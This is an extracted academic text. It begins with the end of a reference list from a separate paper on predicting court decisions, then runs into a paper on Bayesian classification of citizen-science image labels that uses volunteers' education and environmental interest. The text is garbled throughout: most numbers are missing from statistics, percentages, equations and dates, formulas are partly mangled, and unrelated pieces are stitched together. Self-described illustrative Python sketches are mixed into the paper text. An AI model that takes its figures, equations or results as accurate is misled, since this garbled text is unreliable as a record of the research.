systems and technology ( ): : – : . lauderdale be, clark ts. . 
the supreme court’s many median justices. american political science review ( ): – doi . /s . lauderdale be, clark ts. . scaling politically meaningful dimensions using texts and votes. american journal of political science ( ): – doi . /ajps. . aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / lawlor rc. . what computers can do: analysis and prediction of judicial decisions. american bar association journal : – . leach p. . taking a case to the european court of human rights. oxford: oxford university press. leach p, paraskeva c, uelac g. . human rights fact-finding. the european court of human rights at a crossroads. netherlands quarterly of human rights ( ): – . leiter b. . naturalizing jurisprudence: essays on american legal realism and naturalism in legal philosophy. oxford: oxford university press. leiter b. . legal formalism and legal realism: what is the issue? legal theory ( ): – doi . /s . llewellyn kn. . the common law tradition: deciding appeals. william s. hein & co., inc.. miles tj, sunstein cr. . the new legal realism. the university of chicago law review ( ): – . nagel ss. . applying correlation analysis to case prediction. texas law review : . pildes rh. . forms of formalism. the university of chicago law review ( ): – doi . / . popple j. . a pragmatic legal expert system. applied legal philosophy series, dart- mouth (ashgate), aldershot. posner ra. . legal formalism, legal realism, and the interpretation of statutes and the constitution. case western reserve law review : – . pound r. . mechanical jurisprudence. columbia law review ( ): – . preoţiuc-pietro d, lampos v, aletras n. . an analysis of the user occupational class through twitter content. in: proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers). – . preoţiuc-pietro d, volkova s, lampos v, bachrach y, aletras n. . studying user income through language, behaviour and affect in social media. plos one ( ): – doi . /journal.pone. . priest gl, klein b. . the selection of disputes for litigation. the journal of legal studies ( ): – doi . / . salton g, mcgill mj. . introduction to modern information retrieval. new york: mcgraw-hill, inc. salton g, wong a, yang c-s. . a vector space model for automatic indexing. communications of the acm ( ): – doi . / . . schauer f. . prediction and particularity. boston university law review : . segal ja. . predicting supreme court cases probabilistically: the search and seizure cases, – . american political science review ( ): – doi . / . segal ja, spaeth hj. . the supreme court and the attitudinal model revisited. cambridge: cambridge university press. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / sim y, routledge br, smith na. . the utility of text: the case of amicus briefs and the supreme court. in: twenty-ninth aaai conference on artificial intelligence. tamanaha bz. . beyond the formalist-realist divide: the role of politics in judging. princeton: princeton university press. tsarapatsanis d. . the margin of appreciation doctrine: a low-level institutional view. legal studies ( ): – doi . /lest. . turney pd, pantel p. . from frequency to meaning: vector space models of semantics. journal of artificial intelligence research : – . vapnik vn. . statistical learning theory. new york: wiley. von luxburg u. . a tutorial on spectral clustering. statistics and computing ( ): – . wang s, manning cd. . 
baselines and bigrams: simple, good sentiment and topic classification. in: proceedings of the th annual meeting of the association for computational linguistics: short papers-volume . – . aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / using demographics toward efficient data classification in citizen science: a bayesian approach using demographics toward efficient data classification in citizen science: a bayesian approach pietro de lellis , , shinnosuke nakayama and maurizio porfiri , department of electrical engineering and information technology, university of naples federico ii, naples, italy department of mechanical and aerospace engineering, new york university tandon school of engineering, brooklyn, ny, usa department of biomedical engineering, new york university tandon school of engineering, brooklyn, ny, usa abstract public participation in scientific activities, often called citizen science, offers a possibility to collect and analyze an unprecedentedly large amount of data. however, diversity of volunteers poses a challenge to obtain accurate information when these data are aggregated. to overcome this problem, we propose a classification algorithm using bayesian inference that harnesses diversity of volunteers to improve data accuracy. in the algorithm, each volunteer is grouped into a distinct class based on a survey regarding either their level of education or motivation to citizen science. we obtained the behavior of each class through a training set, which was then used as a prior information to estimate performance of new volunteers. by applying this approach to an existing citizen science dataset to classify images into categories, we demonstrate improvement in data accuracy, compared to the traditional majority voting. our algorithm offers a simple, yet powerful, way to improve data accuracy under limited effort of volunteers by predicting the behavior of a class of individuals, rather than attempting at a granular description of each of them. subjects algorithms and analysis of algorithms, scientific computing and simulation keywords citizen science, bayesian estimation, data classification, algorithms introduction involvement of crowds in the creation of goods and services has become a powerful and successful model to achieve goals (howe, ). crowdsourcing can take various forms, which can be classified based on types of contributions and motivations, with openness to the public as a common feature (franzoni & sauermann, ; sauermann & franzoni, ). for example, some crowdsourcing platforms recruit crowdworkers to undertake microtasks (difallah et al., ), and others seek for innovative ideas and solutions (penin & burger-helmchen, ; estellés-arolas & gonzález-ladrón-de guevara, ; majchrzak & malhotra, ; cappa, rosso & hayes, ) or money (lehner, ; belleflamme, lambert & schwienbacher, ), by extrinsically motivating the crowds with rewards. over the past decades, participation in scientific activities by public volunteers, often called citizen science, has emerged as a new tool to conduct science at an unprecedentedly large scale (silvertown, ; bonney et al., ). citizen science is uniquely positioned in crowdsourcing typologies, as the crowds contribute to science how to cite this article de lellis p, nakayama s, porfiri m. . using demographics toward efficient data classification in citizen science: a bayesian approach. peerj comput. sci. :e doi . /peerj-cs. 
submitted june accepted october published november corresponding author maurizio porfiri, mporfiri@nyu.edu academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright de lellis et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:mporfiri@�nyu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ through intrinsic motivation on voluntarism, rather than extrinsic motivation based on receiving rewards (ryan & deci, ; nov, arazy & anderson, ; cappa et al., ). with prevalence of the internet, citizen science now attracts diverse people to contribute to research projects by collecting and analyzing raw data online at their convenience. popular and successful citizen science projects include ebird, where volunteers upload the locations of observed birds (https://ebird.org), and eyewire, where volunteers reconstruct retinal neurons in d from d images (https://eyewire.org). although citizen science enables scientists to acquire a large amount of processed data, it may come at the expense of data quality. since the data are collected and analyzed by the untrained public, they might suffer from low quality, challenging contribution to science (dickinson, zuckerberg & bonter, ; kosmala et al., ; kallimanis, panitsa & dimopoulos, ). therefore, it is of interest to citizen science practitioners to enhance the quality of data, while making good use of volunteers’ effort. a common practice in citizen science builds upon the wisdom of the crowd, whereby scientists distribute the same tasks to multiple participants and then aggregate the data (swanson et al., ). beyond aggregation rules, sophisticated methods have been proposed in the field of crowdsourcing to tackle the so-called noisy labeler problem (sheng, provost & ipeirotis, ; frenay & verleysen, ). one of the most notable methods employs an expectation-maximization algorithm (dawid & skene, ), where the ground truth and the reliability of labelers are simultaneously estimated through an iterative procedure to maximize the likelihood of the model parameters. the method can also be extended into a bayesian framework for more accurate estimation of ground truth and labeler reliability (raykar et al., ; kim & ghahramani, ). however, having a granular characterization of each participant could be practically unfeasible or not convenient. indeed, this would require every volunteer to participate in a preliminary session in which their accuracy would be thoroughly characterized. this might represent an unacceptable misuse of the volunteers’ time, and it will likely be unfeasible in realistic cases where the volunteers contribute only for a very limited time (nov, arazy & anderson, ). an economical solution to mitigate the redundancy of volunteers’ effort is to collect labels on the same instance repeatedly from different labelers until it meets a threshold defined by a requester (chen, lin & zhou, ; li et al., ). further, in dynamic task allocation, a next instance to be labeled is selected from a pool of instances through a bayesian markov decision process, which identifies the instance that would maximize a reward function if it were labeled next (chen, lin & zhou, ). 
in this way, requesters can minimize the effort of labelers, while maintaining adequate data quality. however, the basic algorithm assumes that all labelers have equal reliability, which is unlikely true in citizen science. while the approach can be extended to estimate both ground truth and labeler reliability simultaneously in sequential task allocation, it might become unfeasible in citizen science to accurately estimate reliability of each volunteer with only a few instances of labels (nov, arazy & anderson, ). thus far, the diversity of volunteers in citizen science poses a challenge to accurately estimating the ground truth, but it may be possible to turn the tables and harness this de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://ebird.org https://eyewire.org http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diversity to enhance data accuracy. since citizen science welcomes everyone by nature, volunteers belong to a wide demographic, with diverse age and educational level (cappa et al., ; burgess et al., ), as well as motivations (nov, arazy & anderson, ; curtis, ; cappa et al., ). these individual attributes could provide additional information toward enhancing data accuracy while safeguarding volunteers’ effort. for example, the motivational level explains both quality and quantity in citizen science (nov, arazy & anderson, ), and the educational level is positively related to the accuracy of identifying invasive species (delaney et al., ). in a bayesian sense, this information may help enhance data accuracy by affording an informative prior distribution of reliability for each individual attribute. a bayesian framework has been used by garriga, piera & bartumeus ( ) to evaluate and rank participants in citizen science projects based on their reputation, with the final goal of increasing the likelihood of engagement and the overall data quality. here, we investigate the possibility of employing a bayesian approach to enhance classification accuracy by harnessing diversity of volunteers in citizen science. specifically, this study aims at improving the accuracy of noisy data by incorporating information about demographics of volunteers into a bayesian framework and dynamically distributing tasks among a limited number of volunteers. we use data collected within a citizen science project, the brooklyn atlantis (laut et al., ), where volunteers performed binary classification tasks. the study aimed at monitoring the environment of the gowanus canal (brooklyn, ny), a highly polluted body of water in the usa. volunteers were presented with images of the canal and asked to classify the objects in the images, by assessing whether they might represent a threat to the environment (torre et al., ). before classifying the image, they were asked selected demographic information, which were not analyzed in torre et al. ( ), whose focus was on improving data accuracy by providing a possibility to cast blank votes in a classification task. specifically, the degree of interest of the volunteers toward the environment and their level of education were recorded. using the dataset of torre et al. ( ), we applied a bayesian approach that leverages these individual attributes for enhancing the classification efficiency. to validate the approach, we allocated volunteers randomly to tasks until the theoretical accuracy of the classification overcomes a chosen threshold. 
we computed the average classification accuracy and number of volunteers employed as performance metrics, and compared them against the traditional majority voting approach. methods data collection the data used in this study were collected within a citizen science project for obtaining information about the status of the environmental health of the gowanus canal (brooklyn, ny, usa) (torre et al., ). the images were taken by an aquatic robot designed as part of the brooklyn atlantis project (laut et al., ), which, over the years, was used to address a number of important questions in citizen science, from the effect of design interventions to face-to-face interactions with scientists and on to improving engagement de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in rehabilitation exercises (laut et al., , ; nov, laut & porfiri, ; cappa et al., , ; palermo et al., a, b; diner et al., ; nakayama et al., ; torre et al., ). volunteers were asked to inspect the images of the canal and identify the presence of objects that could endanger the environment (torre et al., ). the images taken by the robot were uploaded on a temporary website built for this experiment, where volunteers could access them from their computers and mobile devices. before taking part in the project, participants had to log in through either a facebook profile or an email account to prevent them from performing the task more than once. after accessing the website, participants were first presented with a short movie about the scope of the project. then, participants initiated a practice session, in which they were instructed to classify whether the object in the image would represent a potential threat to the environment by clicking either a “threat,” “no threat,” or “i don’t know” button below the image. after the task was performed, the correct answer was shown together with a brief explanation. before the experiment, torre et al. ( ) identified the correct answer of each image through careful examination and discussion, and the selection of images only included those which received a unanimous classification. after the classification of two objects in the practice session, the main task started, and participants were asked to classify images consecutively, which appeared on the screen for s each. participant could choose between “threat,” “no threat,” or “i don’t know” buttons, but this time, the correct answer was not displayed. if the participant did not select any answer in s, it was recorded as “no answer.” to avoid possible confounding effects on performance, the order of the images’ display was randomized for each participant. upon completing the classification task, the participants were asked to fill out a short questionnaire where they provided information on their education level and degree of interest toward the environment. the data collection was carried out between february and june , with a total of volunteers recruited in the project. here, we focus on the of them who filled out the preliminary demographic questionnaire. all the participants were over years old and their responses were anonymized. the data collection was approved by the institutional review board of new york university (irb-fy - ). bayesian inference let us assume that a pool v ¼ f ; . . . ; ng of volunteers participates in the binary classification of a set i ¼ f ; . . . ; mg of images. 
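to keep the following derivation concrete, the sketch below shows one possible way of representing a recorded classification together with the demographic answers collected in the questionnaire; the field names and the integer encoding of the four possible outcomes are our own illustrative assumptions, not the authors' implementation.

```python
from dataclasses import dataclass

@dataclass
class Response:
    """one recorded classification of one image by one volunteer (illustrative encoding)."""
    volunteer_id: int
    image_id: int
    answer: int     # 0 = no answer within the time limit, 1 = "threat", 2 = "no threat", 3 = "i don't know"
    interest: int   # declared degree of interest toward the environment (ordinal questionnaire scale)
    education: int  # declared education level (ordinal questionnaire scale)

@dataclass
class GroundTruth:
    """expert label assigned to an image before the experiment."""
    image_id: int
    is_threat: bool
```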
in the process of classification of image i, the unobservable binary parameter that we wish to estimate is denoted as u_i. in our experiment, u_i is equal to 1 if image i contains a threat for the environment, and it is equal to 0 otherwise. a priori, we assume that we have no cues on the possible content of that image, and therefore we set $p_0(u_i = 1) = p_0(u_i = 0) = 0.5$ for all i, where the subscript 0 indicates that we refer to the probability at step 0, that is, before starting the classification process. after every successive classification, we propose to sequentially update these probabilities by using bayes' rule (gelman et al., ). at each classification step, say j ≥ 1, the observable data is the classification y_il of image i performed by participant l = l(j), randomly selected from the pool v at step j. the possible outcomes of the observed variable y_il are 0, corresponding to a late reply (the participant does not classify the image within the time limit), 1 or 2, corresponding to the participant classifying the image as containing or not containing a threat, respectively, and 3, corresponding to an uncertain participant choosing the "i don't know" option. in a bayesian framework, the behavior of the l-th participant is characterized by the conditional probabilities
$p(y_{il} = a \mid u_i = \beta)$, ( )
for all a ∈ {0, 1, 2, 3}, β ∈ {0, 1}, and all images i. since we do not know a priori whether some images are more difficult to classify than others, we assume that the probabilities in ( ) are independent of i, and therefore, for all images i, we write
$p(y_{il} = a \mid u_i = \beta) = p(y_l = a \mid u_i = \beta)$, ( )
which represents the probability that the classification output of the l-th participant is equal to a, given that the image contains (or does not contain) a threat (depending on the value of β). in this work, we propose that the behavior of a volunteer, say the l-th, is related to his/her demographics (such as motivations and educational level), encoded by a vector x_l of one or more integer variables. more specifically, we assume that the probabilities ( ) depend on the variables x_l, which are therefore called explanatory in the bayesian literature (carlin, louis & carlin, ; gelman et al., ; garriga, piera & bartumeus, ). accordingly, based on the classification performed by the participant l(j) randomly selected at step j, and on his/her demographics, the probability that image i contains a threat for the environment can be updated in a bayesian fashion as follows:
$p_j(u_i = 1) = \frac{p(y_l = a, u_i = 1, x_l)}{p(y_l = a, x_l)} = \frac{p(y_l = a \mid u_i = 1, x_l)\, p(x_l, u_i = 1)}{p(y_l = a \mid x_l)\, p(x_l)} = \frac{p(y_l = a \mid u_i = 1, x_l)\, p(x_l \mid u_i = 1)\, p(u_i = 1)}{p(y_l = a \mid x_l)\, p(x_l)}$, ( )
for all j ≥ 1, where p_j(u_i = 1) is defined as p_j(u_i = 1 | y_l = a, x_l), and we omit the explicit dependence of l on j to simplify the notation. observing that x_l and u_i are independent, we have p(x_l | u_i = 1) = p(x_l), thus yielding
$p_j(u_i = 1) = \frac{p(y_l = a \mid u_i = 1, x_l)\, p(u_i = 1)}{p(y_l = a \mid x_l)}$. ( )
from the law of total probability, we can write
$p(y_l = a \mid x_l) = p(y_l = a \mid u_i = 1, x_l)\, p(u_i = 1 \mid x_l) + p(y_l = a \mid u_i = 0, x_l)\, p(u_i = 0 \mid x_l)$. ( )
noting again the independence between x_l and u_i, and substituting ( ) into ( ), we finally establish
$p_j(u_i = 1) = \frac{p(y_l = a \mid u_i = 1, x_l)\, p_{j-1}(u_i = 1)}{p(y_l = a \mid u_i = 1, x_l)\, p_{j-1}(u_i = 1) + p(y_l = a \mid u_i = 0, x_l)\, p_{j-1}(u_i = 0)}$, ( )
where we used p_{j-1}(u_i = 1) as the prior.
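the recursion above lends itself to a very small implementation. the sketch below is a minimal illustration of one update step, assuming the conditional probabilities for the volunteer's demographic class are available as a dictionary; the function name, the dictionary layout, and the toy numbers are our own assumptions, not the authors' code.

```python
def update_posterior(prior_threat, answer, class_cond_prob):
    """one bayes step: p_{j-1}(u_i = 1) -> p_j(u_i = 1) after observing one classification.

    prior_threat: current probability that the image contains a threat.
    answer: observed output a in {0, 1, 2, 3}.
    class_cond_prob: {beta: {a: p(y = a | u = beta, x)}} for the volunteer's class x.
    """
    like_threat = class_cond_prob[1][answer]
    like_no_threat = class_cond_prob[0][answer]
    numerator = like_threat * prior_threat
    denominator = numerator + like_no_threat * (1.0 - prior_threat)
    return numerator / denominator if denominator > 0 else prior_threat


# toy conditional probabilities for a single demographic class (illustrative values only)
toy_class = {
    1: {0: 0.05, 1: 0.70, 2: 0.15, 3: 0.10},  # image contains a threat
    0: {0: 0.05, 1: 0.10, 2: 0.75, 3: 0.10},  # image does not contain a threat
}

posterior = 0.5                 # non-informative prior p_0(u_i = 1)
for observed_answer in (1, 1, 3):
    posterior = update_posterior(posterior, observed_answer, toy_class)
```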
once the conditional probabilities p(yl = a|ui = β, xl), for all a, β, and xj, have been estimated on a sample of volunteers, then, as a new volunteer v decides to participate in the study, we only need access to the demographics xv to characterize his/her behavior. setting a threshold . � s < , we label the image as classified at the first step t � such that either pt (ui = ) > s or pt (ui = ) < - s, and the final classification is ûi ¼ arg max b f ; g ptðui ¼ bÞ: ( ) the threshold s can be viewed as the selected confidence level for the classification. clearly, the higher s is, the higher the accuracy would be, but this would require a larger number of volunteers to classify the image. the effectiveness of the bayesian inference is intrinsically related to our knowledge of the conditional probabilities in eq. ( ). if these probabilities were fully known, the more explanatory variables we considered, the faster pj(ui = ) would converge to either or , thereby leading to a more efficient classification for a given confidence level s. however, in real applications we can only perform sample estimations of these conditional probabilities, which are typically evaluated on a small dataset. therefore, their accuracy might be undermined by the sample size, but also by a biased demographic distribution of the sample. hence, a trade-off arises in the choice of the explanatory variables: adding variables increases the theoretical classification accuracy, but the sample estimation might become less accurate due to the reduced size of the sample on which the conditional probabilities are estimated. therefore, in designing a bayesian classification algorithm, a crucial point is the selection of how many and which explanatory variables should be considered. classification algorithm we consider the degree of interest toward the environment and the level of education of the volunteers as possible explanatory variables. the interest toward the environment is encoded by the integer xl , ranging from (participant l is “not at all” interested) to (participant l is “very much” interested), while the education level is encoded by a second integer parameter xl , which increases from (“high school diploma or less”) to (“graduate or professional degree”) as the participant education level increases, while it is set to if he/she prefers not to answer. accordingly, this yields three possible choices for xl: the behavior of the participant can be evaluated based only on the degree of interest toward the environment (xl = xl ), on the education level (xl = xl ), or on both explanatory variables (xl = [xl xl ] t, where the superscript t means matrix transposition). for any possible choice of xl, adopting a bayesian approach for classification requires a preliminary estimation of the participants’ accuracy based on their demographics. specifically, this consists in estimating the conditional probabilities . this selection of the prior implies that pj ui ¼ ð Þ is also conditioned on the classifications and demographics of participants lð Þ; . . . ; lðj � Þ. de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pðyl ¼ ajui ¼ b; xlÞ; ( ) for all a ∈ { , , , }, β ∈ { , }, and all possible values of xl. to this aim, we consider the set of volunteers v who filled out the demographic questionnaire, and partition it in two groups, denoted t and c, respectively. 
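as a rough illustration of the training step described above, the following sketch estimates the conditional probabilities on the training set t by simple counting within each demographic class; the tuple format, the additive smoothing constant, and the helper name are assumptions of ours and are not taken from the paper.

```python
from collections import Counter, defaultdict

def estimate_conditional_probs(training_records, smoothing=1e-6):
    """sample estimate of p(y = a | u = beta, x) from the training set.

    training_records: iterable of (x, beta, a) tuples, where x identifies the volunteer's
    demographic class (interest level, education level, or the pair of both), beta is the
    ground-truth label of the image (0 or 1), and a in {0, 1, 2, 3} is the recorded output.
    smoothing: small additive constant (our assumption) so that outcomes never observed
    in a class do not receive probability exactly zero.
    """
    counts = defaultdict(Counter)
    for x, beta, a in training_records:
        counts[(x, beta)][a] += 1

    estimates = {}
    for (x, beta), counter in counts.items():
        total = sum(counter.values()) + 4 * smoothing
        estimates[(x, beta)] = {a: (counter[a] + smoothing) / total for a in range(4)}
    return estimates


# usage on a toy training set of (class, ground truth, answer) triples
toy_training = [(3, 1, 1), (3, 1, 1), (3, 0, 2), (2, 1, 3), (2, 0, 2), (2, 0, 0)]
conditional_probs = estimate_conditional_probs(toy_training)
```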
the set t encompasses the volunteers used to compute the sample estimations bpðyl ¼ ajui ¼ b; xlÞ ( ) of the conditional probabilities in eq. ( ), and is called training set in the following, while the set c ¼ v � t is used for testing the performance of the bayesian approach. namely, each image i i is classified as a result of the following steps: � initialization: the prior is set to bp ðhi ¼ bÞ ¼ p ðhi ¼ bÞ ¼ : , β = , , and the set of volunteers available for classification at step is a ¼ c; a threshold s is selected in the interval : ; ð Þ; � step j � : a participant l = l(j) is randomly selected in aj� , which is updated as aj ¼ aj� � flðjÞg; ( ) and the estimated probabilities bpjðu ¼ bÞ, β ∈ { , }, leveraging the sample estimations ( ), are computed as bpjðui ¼ Þ ¼ bpðyl ¼ ailjui ¼ ; xlÞbpj� ðui ¼ Þbpðyl ¼ ailjui ¼ ; xlÞbpj� ðui ¼ Þ þ bpðyl ¼ ailjui ¼ ; xlÞbpj� ðui ¼ Þ ; ( ) and bpjðhi ¼ Þ ¼ � bpjðhi ¼ Þ, where ail is the output of the classification of image i performed by participant l; and � termination: the algorithm terminates at the first step t such that either at ¼ [ or max bptðui ¼ Þ; bptðui ¼ Þ n o . s: ( ) similar to eq. ( ), the i-th image is classified as ĥi ¼ arg max b f ; g bptðui ¼ bÞ; and the number of participants used to classify image i is recorded as ni = t. performance analysis out of the volunteers who participated in the study, we focus on the who filled out the questionnaire, so that jvj ¼ . our goal is to determine whether the bayesian approach can successfully leverage demographic information, and which individual attributes should be used as a proxy of reliability. furthermore, we seek to evaluate the impact on the overall performance of the termination threshold s, which is varied in the set ( . , ) with step . . then, for each value of s and for all the three possible selections of xl, we evaluate the performance of the classification algorithm in terms of the average number ν of volunteers employed, computed as m ¼ pi i ni= ij j; with ni being the number of de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ volunteers considered to classify the i-th image, and of classification accuracy w, evaluated as the fraction of the images that is correctly classified. the ground truth used to evaluate w is represented by the preliminary classification performed by torre et al. ( ). we notice that the performance of the classification algorithm might be biased by the choice of the set of volunteers t employed for estimating the conditional probabilities ( ), and by the specific classification order of the volunteers in the set c. we set the cardinality of the set t to , which is approximately half of the total number of volunteers, and, to avoid potential biases, we randomly pick m = , alternative selections ti, i = , : : : ,m, of the set t, and for each i we consider p = random permutations of ci ¼ v � ti. then, for each possible choice of s and xl, we compute the mean values �v and �m as �xðs; xlÞ ¼ mp xm i¼ xp j¼ xijðs; xlÞ; mðs; xlÞ ¼ mp xm i¼ xp j¼ mijðs; xlÞ; ( ) where wij and νij are the accuracy and average number of volunteers employed when using ti as the training set and considering the j-th permutation of ci as the classification sequence, respectively. for comparison purposes, we use the majority voting approach (kestler et al., ) as a reference. 
namely, we consider the outcome of the classification when using the same sequence and number of participants used for bayesian estimation, and compute its average value �xmvðs; xlÞ for all s and for all the three possible choices of xl. a complementary metric is the percentage π(s, xl) of all trials where the accuracy of the bayesian approach overcomes that of majority voting. to further delve into the performance difference between the two approaches and clarify the impact of the threshold s, we present receiver operating characteristic (roc) curves, typically employed to compare and select binary classifiers (fawcett, ). for each value of the threshold s, the roc curve depicts the true positive rate (tpr) against the false positive rate (fpr). the tpr is defined as the fraction of real positives (the image contains a threat) that are correctly classified as positive, while the fpr is the fraction of real negative (the image does not contains a threat) that are incorrectly classified as positive. then, for each value of the threshold s, we extract a scalar unbiased measure of accuracy, the area under the curve (auc) (powers, ). we remark that, as the threshold s modulates the number of participants employed to classify an image, and not the rate of positives, the roc curves might not be monotone as in standard roc analysis (fawcett, ). results preliminary analysis of the citizen science data in total, volunteers filled out the demographic questionnaire. table presents the demographic composition of the pool of volunteers, while tables and describe the distribution of the classifications outputs depending on the degree of interest toward the environment and on the education level, respectively. the w test for independence de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ revealed that the distributions of answers were different among xl (x = , , p < . ) and among xl (x = , , p = . ). from visual inspection, we cannot identify any trivial relationship between the classification output and demographics. lack of correlation is also supported by the kendall rank correlation coefficients ρ and ρ between the fraction of images correctly classified and the variables xl and xl , respectively. although one might expect volunteers’ accuracy to be positively correlated both with their interest toward the environment and education, we found ρ = - . and ρ = - . , suggesting an absence of a linear dependence. a closer look at the conditional distributions can help identify some non-trivial relationships between the classification outputs and demographics. for instance, from table we observe that the number of late replies is the highest when participants are “very much” interested in the environment. this could suggest that the participants are afraid to misjudge the image and then click the wrong button, due to their genuine concern for the environment. at the same time, their percentage of false positives is the lowest, table demographic composition of the pool of volunteers. xl xl n/a total n/a total note: n/a corresponds to non-valid answers. table counts of late responses, true positives, false positives, true negatives, false negatives, and “i don’t know” based on the interest toward the environment. 
xl, true positives, false positives, true negatives, false negatives, late responses, i don't know.
table counts of late responses, true positives, false positives, true negatives, false negatives, and "i don't know" based on the education level.
xl, true positives, false positives, true negatives, false negatives, late responses, i don't know.
note: none of the participants has "high school diploma or less" (xl = ) or preferred not to answer (xl = ).
so they seldom generate a false alarm. our bayesian estimation algorithm has the potential of leveraging this kind of less trivial nonlinear relationships between volunteers' accuracy and demographics. bayesian inference against majority voting in bayesian estimation, the selection of the most appropriate explanatory variables is crucial for boosting its performance. although in principle the more explanatory variables we include, the better estimation we attain, the finiteness of the training sample requires a more thoughtful approach. in fig. , we compare the performance for the three alternative choices of xl, that is, the explanatory variables are either both the degree of interest toward the environment and education level (xl = [xl1 xl2]^t), or just one of the two attributes (xl = xl1 or xl = xl2). from panel a, we see that, for all values of the threshold s, the accuracy decreases when both explanatory variables are considered. this outcome can be explained by considering that the training sample t is too small to allow for an accurate estimation of the conditional probabilities in eq. ( ) for all the possible combinations of xl1 and xl2. furthermore, we observe that the best performance is obtained when the interest toward the environment is used as the explanatory variable. this can be expounded by looking at the demographic composition of the pool. indeed, from table we observe a more uniform distribution of the pool with respect to xl1, while the distribution of the education level is skewed, as more than % of the participants has a graduate or professional degree. this clearly limits the accuracy in the estimation of the conditional probabilities in ( ) when xl includes the education variable, thus explaining the superior accuracy associated to the choice xl = xl1. the effectiveness of a bayesian approach is also confirmed by a direct comparison with the majority voting. as one can note from fig. a, for all possible choices of the explanatory variables xl and the threshold s, the average accuracy of the bayesian algorithm is superior to majority voting when the same sequence of labelers is used. furthermore, in all cases the percentage π(s, xl) of trials in which the bayesian classification outperforms majority voting is larger than . %, see fig. b. choosing xl = xl1 results in a higher performance, with a peak of π(s, xl) = . % when s = . .
figure: mean accuracy of the bayesian classification approach (solid lines) and of the majority voting using the same sequence of volunteers (dotted lines) (a), and percentage of trials where the bayesian approach outperforms majority voting (b), as a function of the mean number of volunteers used for classification.
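the comparison with majority voting outlined above can be mimicked with a short routine that stops the bayesian update at the chosen confidence level and then lets the same volunteers vote; the handling of ties and of the "i don't know" and late answers in the vote count is our own simplifying assumption, not a detail reported by the authors.

```python
def bayes_vs_majority(answer_sequence, conditional_probs, threshold):
    """classify one image with the bayesian stopping rule and with majority voting
    over the same (randomly ordered) volunteers.

    answer_sequence: list of (x, a) pairs, one per volunteer, in the order they are drawn.
    conditional_probs: estimates of p(y = a | u = beta, x) keyed by (x, beta).
    threshold: confidence level s in (0.5, 1).
    returns (bayesian_label, majority_label, volunteers_used).
    """
    p_threat, used = 0.5, 0
    for x, a in answer_sequence:
        used += 1
        like1 = conditional_probs[(x, 1)][a]
        like0 = conditional_probs[(x, 0)][a]
        denom = like1 * p_threat + like0 * (1.0 - p_threat)
        if denom > 0.0:
            p_threat = like1 * p_threat / denom
        if p_threat > threshold or p_threat < 1.0 - threshold:
            break

    bayesian_label = int(p_threat >= 0.5)

    # majority vote over the same volunteers: only explicit "threat" (a = 1) and
    # "no threat" (a = 2) answers count; ties are resolved in favor of "threat"
    threat_votes = sum(1 for _, a in answer_sequence[:used] if a == 1)
    no_threat_votes = sum(1 for _, a in answer_sequence[:used] if a == 2)
    majority_label = int(threat_votes >= no_threat_votes)

    return bayesian_label, majority_label, used
```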
figure illustrates how the threshold s can be used to modulate the tradeoff between accuracy and average number of volunteers employed. if the conditional probabilities ( ) were known, both the accuracy and number of volunteers should monotonically increase with s. however, this becomes nontrival when those probabilities are estimated, whereby a correct choice of the explanatory variable is crucial. for xl = xl and low values of s the average accuracy �x decreases with s, but, when the optimal choice xl = xl is made, monotonicity is regained and the more participants we use, the more the accuracy improves. a b figure mean accuracy (a) and mean number of participants (b) as a function of the threshold s. full-size doi: . /peerj-cs. /fig- a b figure roc curve (a) and area under the curve (b) as a function of the threshold for the bayesian (solid lines) and majority voting (dotted lines) classifiers. full-size doi: . /peerj-cs. /fig- de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these considerations are further confirmed by the roc analyses in fig. , as an alternative accuracy measure, the auc, is also non-monotone with s for xl = xl , while for xl = xl we can tune s to regulate the tradeoff between the auc and �m. moreover, the roc curves highlight differences between the two classifiers, where we observe a shift of the curves toward the left, such that our bayesian classifier strongly reduces the fpr. this comes at the price of a moderate decrease of the tpr. discussion in this study, we proposed a bayesian approach to enhance data quality in citizen science projects where sequential tasks have to be processed by a limited number of volunteers. by harnessing the diversity of participants in citizen science, we developed an algorithm that characterizes the behavior and accuracy of each participant based on his/her demographics. to demonstrate the effectiveness of our approach, we used data collected within the brooklyn atlantis project (torre et al., ), where participants were asked to determine if selected pictures of the gowanus canal contained potential threats for the environment or not. specifically, we posited that participants could be grouped in classes depending on their motivation to participate to the study, measured by their declared interest toward the environment, and on their level of education. following a bayesian rationale, we characterized the behavior of each class of participants on a training dataset, by estimating the probability of each possible classification output conditioned to the actual content of the image. our numerical analyses showed that, without resorting to a granular characterization of each participant, a bayesian algorithm has superior performance compared with the traditional majority voting approach (kestler et al., ). we were able to leverage the highly nonlinear relationships between the participants’ accuracy and their demographics toward higher accuracy, without increasing their workload. differently from powerful alternatives to majority voting, such as the expectation maximization algorithm (dempster, laird & rubin, ; dawid & skene, ), our approach does not require estimating the accuracy of each participant. this feature is crucial for citizen science applications, where the contribution of the volunteers might be limited to a few instances (nov, arazy & anderson, ). 
